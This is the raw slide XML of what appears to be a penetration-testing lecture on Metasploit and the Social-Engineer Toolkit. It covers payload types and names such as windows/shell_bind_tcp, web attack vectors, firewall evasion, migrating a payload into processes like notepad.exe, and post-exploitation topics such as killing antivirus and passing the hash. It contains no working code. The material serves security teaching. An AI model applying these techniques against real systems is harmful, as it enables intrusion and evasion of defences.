            <a:ext cy="5715473" cx="840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0" name="Shape 59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91" name="Shape 591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On Windows 7 - Chrome</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="592" name="Shape 592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593" name="Shape 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600200" x="152400"/>
            <a:ext cy="5170278" cx="8838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7" name="Shape 59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98" name="Shape 598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On mobile?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="599" name="Shape 599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I haven't tested thoroughly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My tests didn't even pop up any consent prompt though :D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need shellcode specific to architecture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ARM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Exynos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Snapdragon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ATOM (x86 based)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Tegra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Qualcom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MT6577+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Apple A6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...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0" name="Shape 600"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="3515525" x="3818425"/>
            <a:ext cy="2942250" cx="1590100"/>
          </a:xfrm>
          <a:custGeom>
            <a:pathLst>
              <a:path w="63604" extrusionOk="0" h="117690">
                <a:moveTo>
                  <a:pt y="0" x="7788"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt y="22067" x="44133"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt y="50624" x="35047"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt y="59278" x="63604"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt y="66633" x="38075"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt y="102546" x="43700"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt y="117690" x="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat">
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd w="lg" len="lg" type="none"/>
            <a:tailEnd w="lg" len="lg" type="none"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="601" name="Shape 601"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="4510700" x="5473425"/>
            <a:ext cy="1963500" cx="34559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sz="1800" lang="en">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>From a security perspective, the current state of processor diversity is a HUGE hurdle for attackers to get into mobile hacking at low levels</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:cut/>
  </p:transition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5" name="Shape 60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06" name="Shape 606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Disclaimer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="607" name="Shape 607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No one named Bill Gates had nothing to do with this.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:cut/>
  </p:transition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1" name="Shape 61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12" name="Shape 612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Firewall notes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="613" name="Shape 613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Depending on the payload, this may get caught by a firewall</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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wise to use commonly open ports</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="614" name="Shape 6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2905125" x="2038350"/>
            <a:ext cy="3638550" cx="506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" name="Shape 8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83" name="Shape 83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b="1" lang="en">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: is the means by which an attacker/pen tester takes advantage of a flaw within a system (i.e. buffer overflow)</a:t>
            </a:r>
          </a:p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b="1" lang="en">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: is the code we want the system to execute in the exploit.  The MSF allows you to select and deliver various payloads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>
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Three types of payloads:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="2" indent="-381000" marL="1371600">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Arial"/>
              <a:buAutoNum type="romanLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Singles</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="3" indent="-342900" marL="1828800">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>windows/shell_bind_tcp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="2" indent="-381000" marL="1371600">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Arial"/>
              <a:buAutoNum type="romanLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Stagers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="2" indent="-381000" marL="1371600">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Arial"/>
              <a:buAutoNum type="romanLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Stages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="3" indent="-342900" marL="1828800">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>windows/shell/bind_tcp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="4" indent="-342900" marL="2286000">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>stager (bind_tcp), and stage (shell)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="84" name="Shape 84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Metasploit terminology</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:cut/>
  </p:transition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8" name="Shape 61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19" name="Shape 619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SET web attack vectors</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="620" name="Shape 620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IF the user clicks yes, they can get pwned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Even easier with a valid certificate the browser trusts</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="621" name="Shape 6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2164762" x="457200"/>
            <a:ext cy="3228975" cx="60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5" name="Shape 62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26" name="Shape 626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SET web-attack vectors</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="627" name="Shape 627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Lesson Learned</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="628" name="Shape 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2231725" x="1238250"/>
            <a:ext cy="3733800" cx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9" name="Shape 629"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="5946550" x="2657850"/>
            <a:ext cy="603300" cx="57689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sz="1800" lang="en">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Actually safer to uninstall (in my opinion)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:cut/>
  </p:transition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3" name="Shape 63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34" name="Shape 634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 Note</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="635" name="Shape 635"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="1447800" x="457200"/>
            <a:ext cy="4967700" cx="21356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sz="1800" lang="en"/>
              <a:t>This is somewhat detectable on the victims side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rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" lang="en"/>
              <a:t>But even if the victim finds the process and kills it, they wont be safe.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" lang="en"/>
              <a:t>The attacker can </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" lang="en">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>migrate the payload </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" lang="en"/>
              <a:t>to other processes.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" lang="en"/>
              <a:t>notepad.exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" lang="en"/>
              <a:t>conhost.exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" lang="en"/>
              <a:t>etc.....</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="636" name="Shape 6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05998" x="2608384"/>
            <a:ext cy="6646002" cx="6535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0" name="Shape 64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pic>
        <p:nvPicPr>
          <p:cNvPr id="641" name="Shape 6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y="0" x="2281728"/>
            <a:ext cy="6858812" cx="6862271"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="642" name="Shape 642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/>
              <a:t>Post Exploitation </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>&amp; Meterpreter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killing antivirus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evasion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pivoting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passing the hash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="1" indent="-381000" marL="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>and more</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent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3" name="Shape 643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Next time</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:cut/>
  </p:transition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7" name="Shape 64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48" name="Shape 648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Questions?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="649" name="Shape 649"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="1600200" x="457200"/>
            <a:ext cy="49677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pic>
        <p:nvPicPr>
          <p:cNvPr id="650" name="Shape 6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893000" x="400050"/>
            <a:ext cy="4597399" cx="834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